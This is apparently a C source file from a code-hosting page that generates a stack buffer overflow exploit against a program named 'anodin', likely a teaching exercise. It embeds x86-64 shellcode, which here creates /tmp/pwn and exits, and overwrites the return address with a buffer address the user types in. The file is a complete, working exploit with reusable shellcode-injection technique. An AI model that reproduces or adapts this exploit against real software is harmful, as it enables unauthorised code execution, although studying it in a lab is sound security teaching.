29 lines
764 B
C
29 lines
764 B
C
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
unsigned char exploit[1024] = {
|
|
0xeb,0x2b,0x48,0x31,0xff,0x5f,0x68,0x4b,0xfe,0xff,0xff,0x48,0x31,0xf6,0x5e,0x48,0xf7,0xde,0x48,0x83,0xc6,0x01,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd0,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e
|
|
};
|
|
|
|
int main(void) {
|
|
int i;
|
|
void **exploit_ptr = (void*) &exploit;
|
|
void *ptr;
|
|
|
|
fprintf(stderr,"Type the buf address printed by anodin\n");
|
|
scanf("%p", &ptr);
|
|
|
|
// écraser l'adresse de retour
|
|
for (i = 0; i < 8; i++)
|
|
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
|
|
|
for (i=0;i<sizeof(exploit);i++)
|
|
putchar(exploit[i]);
|
|
|
|
for (i=0;i<8192;i++)
|
|
putchar('\n');
|
|
|
|
fflush(stdout);
|
|
|
|
return 0;
|
|
}
|